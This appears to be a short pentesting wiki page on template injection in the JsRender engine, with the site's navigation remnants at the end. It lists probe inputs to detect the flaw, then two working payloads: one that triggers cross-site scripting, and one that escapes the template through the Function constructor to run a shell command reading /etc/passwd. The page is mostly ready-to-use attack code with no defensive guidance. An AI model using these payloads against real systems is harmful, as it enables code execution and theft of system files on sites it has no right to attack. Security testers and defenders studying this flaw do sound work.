JsRender Template Injection

JsRender is a light-weight but powerful template engine. It is vulnerable to template injection.

Investigation

Try to insert arbitrary code into double curly brackets. If the result of the code is reflected in the page, we can inject malicious code in the template.

{{:2*3}}
{{:"test".toString}}

Exploitation

# XSS
{{:"test".toString.constructor.call({},"alert(1)")}}
# Read local files
{{:"test".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}

References

AppCheck

PreviousWerkzeug Pentesting NextJS

Last updated 1 month ago

hashtagInvestigation

hashtagExploitation

hashtagReferences

Investigation

Exploitation

References